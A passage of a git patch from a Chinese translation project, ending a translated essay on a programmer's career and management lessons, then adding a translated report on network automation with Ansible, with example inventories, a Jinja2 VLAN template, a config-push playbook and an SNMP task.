模型中的“N”和“K”)。当然对那些使用复杂隐藏,信息隐藏和数据抽象,并且使用松散异步耦合来限制组件之间的交互的技术的系统设计者来说,这是很自然的。 + + +我们一直面临的一个挑战是,我们想到的许多拓展系统的方法,都跨越了所有的方面。实时共同编辑是 Office 应用程序最近的一个非常具体的(也是最复杂的)例子。 + +我们的数据模型的复杂性往往等同于“能力”。设计用户体验的固有挑战是我们需要将有限的一组手势,映射到底层数据模型状态空间的转换。增加状态空间的维度不可避免地在用户手势中产生模糊性。这是“[纯数学][11]”,这意味着确保系统保持“易于使用”的最基本的方式常常是约束底层的数据模型。 + +管理 + +我从高中开始着手一些领导角色(学生会主席!),对承担更多的责任感到理所当然。同时,我一直为自己在每个管理阶段都坚持担任全职程序员而感到自豪。但 Office 的开发副总裁最终还是让我从事管理,离开了日常的编程工作。当我在去年离开那份工作时,我很享受重返编程——这是一个出奇地充满创造力的充实的活动(当修完“最后”的 bug 时,也许也会有一点令人沮丧)。 + +尽管在我加入微软前已经做了十多年的“主管”,但是到了 1996 年我加入微软才真正了解到管理。微软强调“工程领导是技术领导”。这与我的观点一致,帮助我接受并承担更大的管理责任。 + +主管的工作是设计项目并透明地推进项目。透明并不简单,它不是自动的,也不仅仅是有好的意愿就行。透明需要被设计进系统中去。透明工作的最好方式是能够记录每个工程师每天活动的产出,以此来追踪项目进度(完成任务,发现 bug 并修复,完成一个情景)。留意主观上的红/绿/黄,点赞或踩的仪表板。 + +我过去说我的工作是设计反馈回路。独立工程师,经理,行政人员,每一个项目的参与者都能通过分析记录的项目数据,推进项目,产出结果,了解自己在整个项目中扮演的角色。最终,透明化最终成为增强能力的一个很好的工具——管理者可以将更多的局部控制权给予那些最接近问题的人,因为他们对所取得的进展有信心。这样的话,合作自然就会出现。 + +Key to this is that the goal has actually been properly framed (including key resource constraints like ship schedule). Decision-making that needs to constantly flow up and down the management chain usually reflects poor framing of goals and constraints by management. + +关键需要确定目标框架(包括关键资源的约束,如发布的时间表)。如果决策需要在管理链上下不断流动,那说明管理层对目标和约束的框架不好。 + +当我在 Beyond Software 工作时,我真正理解了一个项目拥有一个唯一领导的重要性。原来的项目经理离职了(后来从 FrontPage 雇佣了我)。我们四个主管在是否接任这个岗位上都有所犹豫,这不仅仅由于我们都不知道要在这家公司坚持多久。我们都技术高超,并且相处融洽,所以我们决定以同级的身份一起来领导这个项目。然而这槽糕透了。有一个显而易见的问题,我们没有相应的战略用来在原有的组织之间分配资源——这应当是管理者的首要职责之一!当你知道你是唯一的负责人时,你会有很深的责任感,但在这个例子中,这种责任感缺失了。我们没有真正的领导来负责统一目标和界定约束。 + +我有清晰地记得,我第一次充分认识到*倾听*对一个领导者的重要性。那时我刚刚担任了 Word,OneNote,Publisher 和 Text Services 团队的开发经理。关于我们如何组织文本服务团队,我们有一个很大的争议,我走到了每个关键参与者身边,听他们想说的话,然后整合起来,写下了我所听到的一切。当我向其中一位主要参与者展示我写下的东西时,他的反应是“哇,你真的听了我想说的话”!作为一名管理人员,我所经历的所有最大的问题(例如,跨平台和转型持续工程)涉及到仔细倾听所有的参与者。倾听是一个积极的过程,它包括:尝试以别人的角度去理解,然后写出我学到的东西,并对其进行测试,以验证我的理解。当一个关键的艰难决定需要发生的时候,在最终决定前,每个人都知道他们的想法都已经被听到并理解(不论他们是否同意最后的决定)。 + +在 FrontPage 担任开发经理的工作,让我理解了在只有部分信息的情况下做决定的“操作困境”。你等待的时间越长,你就会有更多的信息做出决定。但是等待的时间越长,实际执行的灵活性就越低。在某个时候,你仅需要做出决定。 + +设计一个组织涉及类似的两难情形。您希望增加资源领域,以便可以在更大的一组资源上应用一致的优先级划分框架。但资源领域越大,越难获得作出决定所需要的所有信息。组织设计就是要平衡这两个因素。软件复杂化,因为软件的特点可以在任意维度切入设计。Office 已经使用[共享团队][12]来解决这两个问题(优先次序和资源),让跨领域的团队能与需要产品的团队分享工作(增加资源)。 + +随着管理阶梯的提升,你会懂一个小秘密:你和你的新同事不会因为你现在承担更多的责任,就突然变得更聪明。这强调了整个组织比顶层领导者更聪明。赋予每个级别在一致框架下拥有自己的决定是实现这一目标的关键方法。听取并使自己对组织负责,阐明和解释决策背后的原因是另一个关键策略。令人惊讶的是,害怕做出一个愚蠢的决定可能是一个有用的激励因素,以确保你清楚地阐明你的推理,并确保你听取所有的信息。 + +结语 + +我离开大学寻找第一份工作时,面试官在最后一轮面试时问我对做“系统”和做“应用”哪一个更感兴趣。我当时并没有真正理解这个问题。在软件技术栈的每一个层面都会有趣的难题,我很高兴深入研究这些问题。保持学习。 + +-------------------------------------------------------------------------------- + +via: https://hackernoon.com/education-of-a-programmer-aaecf2d35312 + +作者:[ Terry Crowley][a] +译者:[explosic4](https://github.com/explosic4) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://hackernoon.com/@terrycrowley +[1]:https://medium.com/@terrycrowley/leaky-by-design-7b423142ece0#.x67udeg0a +[2]:https://medium.com/@terrycrowley/how-to-think-about-cancellation-3516fc342ae#.3pfjc5b54 +[3]:http://queue.acm.org/detail.cfm?id=2462076 +[4]:http://web.mit.edu/Saltzer/www/publications/endtoend/endtoend.pdf +[5]:https://medium.com/@terrycrowley/model-view-controller-and-loose-coupling-6370f76e9cde#.o4gnupqzq +[6]:https://en.wikipedia.org/wiki/Termcap +[7]:http://www.ll.mit.edu/HPEC/agendas/proc04/invited/patterson_keynote.pdf +[8]:https://en.wikipedia.org/wiki/Bufferbloat +[9]:http://worrydream.com/refs/Brooks-NoSilverBullet.pdf +[10]:https://en.wikipedia.org/wiki/NK_model +[11]:https://medium.com/@terrycrowley/the-math-of-easy-to-use-14645f819201#.untmk9eq7 +[12]:https://medium.com/@terrycrowley/breaking-conways-law-a0fdf8500413#.gqaqf1c5k From 9f2abcf14213223fd739cc4a051757ce5b65b72a Mon Sep 17 00:00:00 2001 From: qhwdw <33189910+qhwdw@users.noreply.github.com> Date: Tue, 28 Nov 2017 16:36:26 +0800 Subject: [PATCH 0026/1627] Translated by qhwdw MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit 文章很长,文件大小 66 KB,读一遍需要一个小时时间,不过满满的干货,值得好好推广一下。 --- ...0160325 Network automation with Ansible.md | 992 ++++++++++++++++++ 1 file changed, 992 insertions(+) create mode 100644 translated/tech/20160325 Network automation with Ansible.md diff --git a/translated/tech/20160325 Network automation with Ansible.md b/translated/tech/20160325 Network automation with Ansible.md new file mode 100644 index 0000000000..a4d184f57f --- /dev/null +++ b/translated/tech/20160325 Network automation with Ansible.md @@ -0,0 +1,992 @@ +用 Ansible 实现网络自动化 +================ + +### 网络自动化 + +由于 IT 行业的技术变化,从服务器虚拟化到具有自服务能力的公有和私有云、容器化应用、以及提供的平台即服务(Paas),一直以来落后的一个领域是网络。 + +在过去的 5 时间,网络行业似乎有很多新的趋势出现,它们中的很多被归入到软件定义网络(SDN)。 + +###### 注意 + +SDN 是新出现的一种构建、管理、操作、和部署网络的方法。SDN 最初的定义是需要将控制层和数据层(包转发)物理分离,并且,解耦合的控制层必须管理好各自的设备。 + +如今,许多技术已经 _包括在 SDN _ 下面,包括基于控制器的网络(controller-based networks)、网络设备上的 APIs、网络自动化、白盒交换机、策略网络化、网络功能虚拟化(NFV)、等等。 + +由于这篇报告的目的,我们参考 SDN 的解决方案作为我们的解决方案,其中包括一个网络控制器作为解决方案的一部分,并且提升了网络的可管理性,但并不需要从数据层解耦控制层。 + +这些趋势的其中一个是,网络设备上出现的应用程序编辑接口(APIs)作为管理和操作这些设备的一种方法,和真正地提供了机器对机器的通讯。当需要自动化和构建网络应用程序、提供更多数据建模的结构时,APIs 简化了开发过程。例如,当启用 API 的设备在 JSON/XML 中返回数据时,它是结构化的,并且比返回原生文本信息、需要手工去解析的仅命令行的设备更易于使用。 + +在 APIs 之前,用于配置和管理网络设备的两个主要机制是命令行接口(CLI)和简单网络管理协议(SNMP)。让我们来了解一下它们,CLI 是一个到设备的人机界面,而 SNMP 并不是为设备提供实时编程的接口。 + +幸运的是,因为很多供应商争相为设备增加 APIs,有时候 _正是因为_ 它,才被保留到需求建议书(RFP)中,它有一个非常好的副作用 —— 支持网络自动化。一旦一个真实的 API 被披露,访问设备内数据的过程,以及管理配置,会极大的被简单化,因此,我们将在本报告中对此进行评估。虽然使用许多传统方法也可以实现自动化,比如,CLI/SNMP。 + +###### 注意 + +随着未来几个月或几年的网络设备更新,供应商的 APIs 无疑应该被测试,并且要做为采购网络设备(虚拟和物理)的关键决策标准。用户应该知道数据是如何通过设备建模的,被 API 使用的传输类型是什么,如果供应商提供一些库或集成到自动化工具中,并且,如果被用于一个开放的标准/协议。 + +总而言之,网络自动化,像大多数的自动化类型一样,是为了更快地工作。工作的更快是好事,降低部署和配置改变的时间并不总是许多 IT 组织需要去解决的问题。 + +包括速度,我们现在看看这些各种类型的 IT 组织逐渐采用网络自动化的几种原因。你应该注意到,同样的原则也适用于其它类型的自动化。 + + +### 简化架构 + +今天,每个网络都是一个独特的“雪花”型,并且,网络工程师们为能够解决传输和网络应用问题而感到自豪,这些问题最终使网络不仅难以维护和管理,而且也很难去实现自动化。 + +它需要从一开始就包含到新的架构和设计中去部署,而不是去考虑网络自动化和管理作为一个二级或三级项目。哪个特性可以跨不同的供应商工作?哪个扩展可以跨不同的平台工作?当使用特别的网络设备平台时,API 类型或者自动化工程是什么?当这些问题在设计进程之前得到答案,最终的架构将变成简单的、可重复的、并且易于维护 _和_ 自动化的,在整个网络中将很少启用供应商专用的扩展。 + +### 确定的结果 + +在一个企业组织中,改变审查会议(change review meeting)去评估即将到来的网络上的变化、它们对外部系统的影响、以及回滚计划。在这个世界上,人们为这些即 _将到来的变化_ 去接触 CLI,输入错误的命令造成的影响是灾难性的。想像一下,一个有三位、四位、五位、或者 50 位工程师的团队。每位工程师应对 _即将到来的变化_ 都有他们自己的独特的方法。并且,在管理这些变化的期间,使用一个 CLI 或者 GUI 的能力并不会消除和减少出现错误的机率。 + +使用经过验证和测试过的网络自动化可以帮助实现更多的可预测行为,并且使执行团队有更好的机会实现确实性结果,在保证任务没有人为错误的情况下首次正确完成的道路上更进一步。 + + +### 业务灵活性 + +不用说,网络自动化不仅为部署变化提供速度和灵活性,而且使得根据业务需要去从网络设备中检索数据的速度变得更快。自从服务器虚拟化实现以后,服务器和虚拟化使得管理员有能力在瞬间去部署一个新的应用程序。而且,更多的快速部署应用程序的问题出现在,配置一个 VLAN(虚拟局域网)、路由器、FW ACL(防火墙的访问控制列表)、或者负载均衡策略需要多长时间? + +在一个组织内通过去熟悉大多数的通用工作流和 _为什么_ 网络改变是真实的需求?新的部署过程自动化工具,如 Ansible 将使这些变得非常简单。 + +这一章将介绍一些关于为什么应该去考虑网络自动化的高级知识点。在下一节,我们将带你去了解 Ansible 是什么,并且继续深入了解各种不同规模的 IT 组织的网络自动化的不同类型。 + + +### 什么是 Ansible? + +Ansible 是存在于开源世界里的一种最新的 IT 自动化和配置管理平台。它经常被拿来与其它工具如 Puppet、Chef、和 SaltStack 去比较。Ansible 作为一个由 Michael DeHaan 创建的开源项目出现于 2012 年,Michael DeHaan 也创建了 Cobbler 和 cocreated Func,它们在开源社区都非常流行。在 Ansible 开源项目创建之后不足 18 个月时间, Ansilbe 公司成立,并收到了 $6 million 的一系列资金。它成为并一直保持着第一的贡献者和 Ansible 开源项目的支持者。在 2015 年 10 月,Red Hat 获得了 Ansible 公司。 + +但是,Ansible 到底是什么? + +_Ansible 是一个无需代理和可扩展的超级简单的自动化平台。_ + +让我们更深入地了解它的细节,并且看一看 Ansible 的属性,它帮助 Ansible 在行业内获得大量的吸引力(traction)。 + + +### 简单 + +Ansible 的其中一个吸引人的属性是,去使用它你 _不_ 需要特定的编程技能。所有的指令,或者任务都是自动化的,在一个标准的、任何人都可以理解的人类可读的数据格式的一个文档中。在 30 分钟之内完成安装和自动化任务的情况并不罕见! + +例如,下列的一个 Ansible playbook 任务是用于去确保在一个 Cisco Nexus 交换机中存在一个 VLAN: + +``` +- nxos_vlan: vlan_id=100 name=web_vlan +``` + +你无需熟悉或写任何代码就可以明确地看出它将要做什么! + +###### 注意 + +这个报告的下半部分涉到 Ansible 术语(playbooks、plays、tasks、modules、等等)的细节。但是,在我们为网络自动化使用 Ansible 时,我们也同时有一些详细的示例去解释这些关键概念。 + +### 无代理 + +如果你看到市面上的其它工具,比如 Puppet 和 Chef,你学习它们会发现,一般情况下,它们要求每个实现自动化的设备必须安装特定的软件。这种情况在 Ansible 上 _并不_需要,这就是为什么 Ansible 是实现网络自动化的最佳选择的主要原因。 + +它很好理解,那些 IT 自动化工具,包括 Puppet、Chef、CFEngine、SaltStack、和 Ansible,它们最初构建是为管理和自动化配置 Linux 主机,以跟得上部署的应用程序增长的步伐。因为 Linux 系统是被配置成自动化的,要安装代理并不是一个技术难题。如果有的话,它会担误安装过程,因为,现在有 _N_ 多个(你希望去实现自动化的)主机需要在它们上面部署软件。 + +再加上,当使用代理时,它们需要的 DNS 和 NTP 配置更加复杂。这些都是大多数环境中已经配置好的服务,但是,当你希望快速地获取一些东西或者只是简单地想去测试一下它能做什么的时候,它将极大地担误整个设置和安装的过程。 + +由于本报告只是为介绍利用 Ansible 实现网络自动化,它最有价值的是,Ansible 作为一个无代理平台,对于系统管理员来说,它更具有吸引力,这是为什么呢? + +正如前面所说的那样,对网络管理员来说,它是非常有吸引力的,Linux 操作系统是开源的,并且,任何东西都可以安装在它上面。对于网络来说,虽然它正在逐渐改变,但事实并非如此。如果我们更广泛地部署网络操作系统,如 Cisco IOS,它就是这样的一个例子,并且问一个问题, _“第三方软件能否部署在基于 IOS (译者注:此处的 IOS,指的是思科的网络操作系统 IOS)的平台上吗?”_它并不会给你惊喜,它的回答是 _NO_。 + +在过去的二十多年里,几乎所有的网络操作系统都是闭源的,并且,垂直整合到底层的网络硬件中。在一个网络设备中(路由器、交换机、负载均衡、防火墙、等等),不需要供应商的支持,有一个像 Ansible 这样的自动化平台,从头开始去构建一个无代理、可扩展的自动化平台,就像是它专门为网络行业订制的一样。我们最终将开始减少并消除与网络的人工交互。 + +### 可扩展 + +Ansible 的可扩展性也非常的好。作为一个开源的,并且从代码开始将在网络行业中发挥重要的作用,有一个可扩展的平台是必需的。这意味着如果供应商或社区不提供一个特定的特性或功能,开源社区,终端用户,消费者,顾问者,或者,任何可能去 _扩展_ Ansible 的人,去启用一个给定的功能集。过去,网络供应商或者工具供应商通过一个 hook 去提供插件和集成。想像一下,使用一个像 Ansible 这样的自动化平台,并且,你选择的网络供应商发布了你 _真正_ 需要的自动化的一个新特性。从理论上说,网络供应商或者 Ansible 可以发行一个新的插件去实现自动化这个独特的特性,这是一件非常好的事情,从你的内部工程师到你的增值分销商(VARs)或者你的顾问中的任何人,都可以去提供这种集成。 + +正如前面所说的那样,Ansible 实际上是极具扩展性的,Ansible 最初就是为自动化应用程序和系统构建的。这是因为,Ansible 的可扩展性是被网络供应商编写集成的,包括但不限于 Cisco、Arista、Juniper、F5、HP、A10、Cumulus、和 Palo Alto Networks。 + + +### 对于网络自动化,为什么要使用 Ansible? + +我们已经简单了解除了 Ansible 是什么,以及一些网络自动化的好处,但是,对于网络自动化,我们为什么要使用 Ansible? + +在一个完全透明的环境下,已经说的很多的理由是 Ansible 可以做什么,比如,作为一个很大的自动化应用程序部署平台,但是,我们现在要深入一些,更多地关注于网络,并且继续总结一些更需要注意的其它关键点。 + + +### 无代理 + +在实现网络自动化的时候,无代理架构的重要性并不是重点强调的,特别是当它适用于现有的自动化设备时。如果,我们看一下当前网络中已经安装的各种设备时,从 DMZ 和园区,到分支和数据中心,最大份额的设备 _并不_ 具有最新 API 的设备。从自动化的角度来看,API 可以使做一些事情变得很简单,像 Ansible 这样的无代理平台有可能去自动化和管理那些 _传统_ 的设备。例如,_基于CLI 的设备_,它的工具可以被用于任何网络环境中。 + +###### 注意 + +如果仅 CLI 的设备已经集成进 Ansible,它的机制就像是,怎么在设备上通过协议如 telnet、SSH、和 SNMP,去进行只读访问和读写操作。 + +作为一个独立的网络设备,像路由器、交换机、和防火墙持续去增加 APIs 的支持,SDN 解决方案也正在出现。SDN 解决方案的其中一个主题是,它们都提供一个单点集成和策略管理,通常是以一个 SDN 控制器的形式出现。这是真实的解决方案,比如,Cisco ACI、VMware NSX、Big Switch Big Cloud Fabric、和 Juniper Contrail,同时,其它的 SDN 提供者,比如 Nuage、Plexxi、Plumgrid、Midokura、和 Viptela。甚至包含开源的控制器,比如 OpenDaylight。 + +所有的这些解决方案都简化了网络管理,就像他们允许一个管理员去开始从“box-by-box”管理(译者注:指的是单个设备挨个去操作的意思)迁移到网络范围的管理。这是在正确方向上迈出的很大的一步,这些解决方案并不能消除在改变窗口中人类犯错的机率。例如,比起配置 _N_ 个交换机,你可能需要去配置一个单个的 GUI,它需要很长的时间才能实现所需要的配置改变 — 它甚至可能更复杂,毕竟,相对于一个 CLI,他们更喜欢 GUI!另外,你可能有不同类型的 SDN 解决方案部署在每个应用程序、网络、区域、或者数据中心。 + +在需要自动化的网络中,对于配置管理、监视、和数据收集,当行业开始向基于控制器的网络架构中迁移时,这些需求并不会消失。 + +大量的软件定义网络中都部署有控制器,所有最新的控制器都提供(expose)一个最新的 REST API。并且,因为 Ansible 是一个无代理架构,它实现自动化是非常简单的,而不仅仅是没有 API 的传统设备,但也有通过 REST APIs 的软件定义网络解决方案,在所有的终端上不需要有额外的软件(译者注:指的是代理)。最终的结果是,使用 Ansible,无论有或没有 API,可以使任何类型的设备都能够自动化。 + + +### 免费和开源软件(FOSS) + +Ansible 是一个开源软件,它的全部代码在 GitHub 上都是公开的、可访问的,使用 Ansible 是完全免费的。它可以在几分钟内完成安装并为网络工程师提供有用的价值。Ansible,这个开源项目,或者 Ansible 公司,在它们交付软件之前,你不会遇到任何一个销售代表。那是显而易见的事实,因为它是一个真正的开源项目,但是,开源项目的使用,在网络行业中社区驱动的软件是非常少的,但是,也在逐渐增加,我们想明确指出这一点。 + +同样需要指出的一点是,Ansible, Inc. 也是一个公司,它也需要去赚钱,对吗?虽然 Ansible 是开源的,它也有一个叫 Ansible Tower 的企业产品,它增加了一些特性,比如,基于规则的访问控制(RBAC)、报告、 web UI、REST APIs、多租户、等等,(相比 Ansible)它更适合于企业去部署。并且,更重要的是,Ansible Tower 甚至可以最多在 10 台设备上 _免费_ 使用,至少,你可以去体验一下,它是否会为你的组织带来好处,而无需花费一分钱,并且,也不需要与无数的销售代表去打交道。 + + +### 可扩展性 + +我们在前面说过,Ansible 主要是为部署 Linux 应用程序而构建的自动化平台,虽然从早期开始已经扩展到 Windows。需要指出的是,Ansible 开源项目并没有自动化网络基础设施的目标。事实上是,Ansible 社区更多地理解了在底层的 Ansible 架构上怎么更具灵活性和可扩展性,对于他们的自动化需要,它变成了 _扩展_ 的 Ansible,它包含了网络。在过去的两年中,部署有许多的 Ansible 集成,许多行业独立人士(industry independents),比如,Matt Oswalt、Jason Edelman、Kirk Byers、Elisa Jasinska、David Barroso、Michael Ben-Ami、Patrick Ogenstad、和 Gabriele Gerbino,以及网络系统供应商的领导者,比如,Arista、Juniper、Cumulus、Cisco、F5、和 Palo Alto Networks。 + + +### 集成到已存在的 DevOps 工作流中 + +Ansible 在 IT 组织中被用于应用程序部署。它被用于需要管理部署、监视、和管理各种类型的应用程序的操作团队中。通过将 Ansible 集成到网络基础设施中,当新应用程序到来或迁移后,它扩展了可能的范围。而不是去等待一个新的顶架交换机(TOR,译者注:一种数据中心设备接入的方式)的到来、去添加一个 VLAN、或者去检查接口的速度/双工,所有的这些以网络为中心的任务都可以被自动化,并且可以集成到 IT 组织内已经存在的工作流中。 + + +### 幂等性 + +术语 _幂等性_ (明显能提升项目的效能) 经常用于软件开发的领域中,尤其是当使用 REST APIs工作的时候,以及在 _DevOps_ 自动化和配置管理框架的领域中,包括 Ansible。Ansible 的其中一个信念是,所有的 Ansible 模块(集成的)应该是幂等的。那么,对于一个模块来说,幂等是什么意思呢?毕竟,对大多数网络工程师来说,这是一个新的术语。 + +答案很简单。幂等性的本质是允许定义的任务,运行一次或者上千次都不会在目标系统上产生不利影响,仅仅是一种一次性的改变。换句话说,如果一个请求的改变去使系统进入到它期望的状态,这种改变完成之后,并且,如果这个设备已经达到这种状态,它不会再发生改变。这不像大多数传统的定制脚本,和拷贝(copy),以及过去的那些终端窗口中的 CLI 命令。当相同的命令或者脚本在同一个系统上重复运行,会出现错误(有时候)。以前,粘贴一组命令到一个路由器中,然后得到一些使你的其余的配置失效的错误类型?好玩吧? + +另外的例子是,如果你有一个配置 10 个 VLANs 的文件文件或者脚本,那么 _每次_ 运行这个脚本,相同的命令命令会被输入 10 次。如果使用一个幂等的 Ansible 模块,首先会从网络设备中采集已存在的配置,并且,每个新的 VLAN 被配置后会再次检查当前配置。仅仅是这个新的 VLAN 需要去被添加(或者,改变 VLAN 名字,作为一个示例)是一个改变,或者命令真实地推送到设备。 + +当一个技术越来越复杂,幂等性的价值就越高,在你修改的时候,你并不能注意到 _已存在_ 的网络设备的状态,仅仅是从一个网络配置和策略角度去尝试达到 _期望的_ 状态。 + + +### 网络范围的和临时(Ad Hoc)的改变 + +用配置管理工具解决的其中一个问题是,配置“飘移”(当设备的期望配置逐渐漂移,或者改变,随着时间的推移手动改变和/或在一个环境中使用了多个不同的工具),事实上,这也是像 Puppet 和 Chef 得到使用的地方。代理商 _phone home_ 到前端服务器,验证它的配置,并且,如果需要一个改变,则改变它。这个方法是非常简单的。如果有故障了,需要去排除怎么办?你通常需要通过管理系统,直接连到设备,找到并修复它,然后,马上离开,对不对?果然,在下次当代理的电话打到家里,修复问题的改变被覆盖了(基于主/前端服务器是怎么配置的)。在高度自动化的环境中,一次性的改变应该被限制,但是,仍然允许它们(译者注:指的是一次性改变)使用的工具是非常有价值的。正如你想到的,其中一个这样的工具是 Ansible。 + +因为 Ansible 是无代理的,这里并没有一个默认的推送或者拉取去防止配置漂移。自动化任务被定义在 Ansible playbook 中,当使用 Ansible 时,它推送到用户去运行 playbook。如果 playbook 在一个给定的时间间隔内运行,并且你没有用 Ansible Tower,你肯定知道任务的执行频率;如果你正好在终端提示符下使用一个原生的 Ansible 命令行,playbook 运行一次,并且仅运行一次。 + +缺省运行的 playbook 对网络工程师是很具有吸引力的,让人欣慰的是,在设备上手动进行的改变不会自动被覆盖。另外,当需要的时候,一个 playbook 运行的设备范围很容易被改变,即使是对一个单个设备进行自动化的单次改变,Ansible 仍然可以用,设备的 _范围_ 由一个被称为 Ansible 清单(inventory)的文件决定;这个清单可以是一台设备或者是一千台设备。 + +下面展示的一个清单文件示例,它定义了两组共六台设备: + +``` +[core-switches] +dc-core-1 +dc-core-2 + +[leaf-switches] +leaf1 +leaf2 +leaf3 +leaf4 +``` + +为了自动化所有的主机,你的 play 定义的 playbook 的一个片段看起来应该是这样的: + +``` +hosts: all +``` + +并且,一个自动化的叶子节点交换机,它看起来应该像这样: + +``` +hosts: leaf1 +``` + +这是一个核心交换机: + +``` +hosts: core-switches +``` + +###### 注意 + +正如前面所说的那样,这个报告的后面部分将详细介绍 playbooks、plays、和清单(inventories)。 + +因为能够很容易地对一台设备或者 _N_ 台设备进行自动化,所以在需要对这些设备进行一次性改变时,Ansible 成为了最佳的选择。在网络范围内的改变它也做的很好:可以是关闭给定类型的所有接口、配置接口描述、或者是在一个跨企业园区布线的网络中添加 VLANs。 + +### 使用 Ansible 实现网络任务自动化 + +这个报告从两个方面逐渐深入地讲解一些技术。第一个方面是围绕 Ansible 架构和它的细节,第二个方面是,从一个网络的角度,讲解使用 Ansible 可以完成什么类型的自动化。在这一章中我们将带你去详细了解第二方面的内容。 + +自动化一般被认为是速度快,但是,考虑到一些任务并不要求速度,这就是为什么一些 IT 团队没有认识到自动化的价值所在。VLAN 配置是一个非常好的例子,因为,你可能会想,“创建一个 VLAN 到底有多快?一般情况下每天添加多少个 VLANs?我真的需要自动化吗?” + +在这一节中,我们专注于另外几种有意义的自动化任务,比如,设备准备、数据收集、报告、和遵从情况。但是,需要注意的是,正如我们前面所说的,自动化为你、你的团队、以及你的精确的更可预测的结果和更多的确定性,提供了更快的速度和敏捷性。 + +### 设备准备 + +为网络自动化开始使用 Ansible 的最容易也是最快的方法是,为设备最初投入使用创建设备配置文件,并且将配置文件推送到网络设备中。 + +如果我们去完成这个过程,它将分解为两步,第一步是创建一个配置文件,第二步是推送这个配置到设备中。 + +首先,我们需要去从供应商配置文件的底层专用语法(CLI)中解耦 _输入_。这意味着我们需要对配置参数中分离出文件和值,比如,VLANs、域信息、接口、路由、和其它的内容、等等,然后,当然是一个配置的模块文件。在这个示例中,这里有一个标准模板,它可以用于所有设备的初始部署。Ansible 将帮助提供配置模板中需要的输入和值之间的部分。几秒钟之内,Ansible 可以生成数百个可靠的和可预测的配置文件。 + +让我们快速的看一个示例,它使用当前的配置,并且分解它到一个模板和单独的一个(作为一个输入源的)变量文件中。 + +这是一个配置文件片断的示例: + +``` +hostname leaf1 +ip domain-name ntc.com +! +vlan 10 + name web +! +vlan 20 + name app +! +vlan 30 + name db +! +vlan 40 + name test +! +vlan 50 + name misc +``` + +如果我们提取输入值,这个文件将被转换成一个模板。 + +###### 注意 + +Ansible 使用基于 Python 的 Jinja2 模板化语言,因此,这个被命名为 _leaf.j2_ 的文件是一个 Jinja2 模板。 + +注意,下列的示例中,_双大括号({{)_ 代表一个变量。 + +模板看起来像这些,并且给它命名为  _leaf.j2_: + +``` +! +hostname {{ inventory_hostname }} +ip domain-name {{ domain_name }} +! +! +{% for vlan in vlans %} +vlan {{ vlan.id }} + name {{ vlan.name }} +{% endfor %} +! +``` + +因为双大括号代表变量,并且,我们看到这些值并不在模板中,所以它们需要将值保存在一个地方。值被保存在一个变量文件中。正如前面所说的,一个相应的变量文件看起来应该是这样的: + +``` +--- +hostname: leaf1 +domain_name: ntc.com +vlans: + - { id: 10, name: web } + - { id: 20, name: app } + - { id: 30, name: db } + - { id: 40, name: test } + - { id: 50, name: misc } +``` + +这意味着,如果管理 VLANs 的团队希望在网络设备中添加一个 VLAN,很简单,他们只需要在变量文件中改变它,然后,使用 Ansible 中一个叫 `template` 的模块,去重新生成一个新的配置文件。这整个过程也是幂等的;仅仅是在模板或者值发生改变时,它才会去生成一个新的配置文件。 + +一旦配置文件生成,它需要去 _推送_ 到网络设备。推送配置文件到网络设备使用一个叫做 `napalm_install_config`的开源的 Ansible 模块。 + +接下来的示例是一个简单的 playbook 去 _构建并推送_ 一个配置文件到网络设备。同样地,playbook 使用一个名叫 `template` 的模块去构建配置文件,然后使用一个名叫 `napalm_install_config` 的模块去推送它们,并且激活它作为设备上运行的新的配置文件。 + +虽然没有详细解释示例中的每一行,但是,你仍然可以看明白它们实际上做了什么。 + +###### 注意 + +下面的 playbook 介绍了新的概念,比如,内置变量 `inventory_hostname`。这些概念包含在 [Ansible 术语和入门][1] 中。 + +``` +--- + + - name: BUILD AND PUSH NETWORK CONFIGURATION FILES + hosts: leaves + connection: local + gather_facts: no + + tasks: + - name: BUILD CONFIGS + template: + src=templates/leaf.j2 + dest=configs/{{inventory_hostname }}.conf + + - name: PUSH CONFIGS + napalm_install_config: + hostname={{ inventory_hostname }} + username={{ un }} + password={{ pwd }} + dev_os={{ os }} + config_file=configs/{{ inventory_hostname }}.conf + commit_changes=1 + replace_config=0 +``` + +这个两步的过程是一个使用 Ansible 进行网络自动化入门的简单方法。通过模板简化了你的配置,构建配置文件,然后,推送它们到网络设备 — 因此,被称为 _BUILD 和 PUSH_ 方法。 + +###### 注意 + +像这样的更详细的例子,请查看 [Ansible 网络集成][2]。 + +### 数据收集和监视 + +监视工具一般使用 SNMP — 这些工具拉某些管理信息库(MIBs),然后给监视工具返回数据。基于返回的数据,它可能多于也可能少于你真正所需要的数据。如果接口基于返回的数据统计你正在拉的内容,你可能会返回在 _show interface_ 命令中显示的计数器。如果你仅需要 _interface resets_ 并且,希望去看到与重置相关的邻接 CDP/LLDP 的接口,那该怎么做呢?当然,这也可以使用当前的技术;可以运行多个显示命令去手动解析输出信息,或者,使用基于 SNMP 的工具,在 GUI 中切换不同的选项卡(Tab)找到真正你所需要的数据。Ansible 怎么能帮助我们去完成这些工作呢? + +由于 Ansible 是完全开放并且是可扩展的,它可以精确地去收集和监视所需要的计数器或者值。这可能需要一些预先的定制工作,但是,最终这些工作是非常有价值的。因为采集的数据是你所需要的,而不是供应商提供给你的。Ansible 也提供直观的方法去执行某些条件任务,这意味着基于正在返回的数据,你可以执行子任务,它可以收集更多的数据或者产生一个配置改变。 + +网络设备有 _许多_ 统计和隐藏在里面的临时数据,而 Ansible 可以帮你提取它们。 + +你甚至可以在 Ansible 中使用前面提到的 SNMP 的模块,模块的名字叫 `snmp_device_version`。这是在社区中存在的另一个开源模块: + +``` + - name: GET SNMP DATA + snmp_device_version: + host=spine + community=public + version=2c +``` + +运行前面的任务返回非常多的关于设备的信息,并且添加一些级别的发现能力到 Ansible中。例如,那个任务返回下列的数据: + +``` +{"ansible_facts": {"ansible_device_os": "nxos", "ansible_device_vendor": "cisco", "ansible_device_version": "7.0(3)I2(1)"}, "changed": false} +``` + +你现在可以决定某些事情,而不需要事先知道是什么类型的设备。你所需要知道的仅仅是设备的只读通讯字符串。 + + +### 迁移 + +从一个平台迁移到另外一个平台,可能是从同一个供应商或者是从不同的供应商,迁移从来都不是件容易的事。供应商可能提供一个脚本或者一个工具去帮助你迁移。Ansible 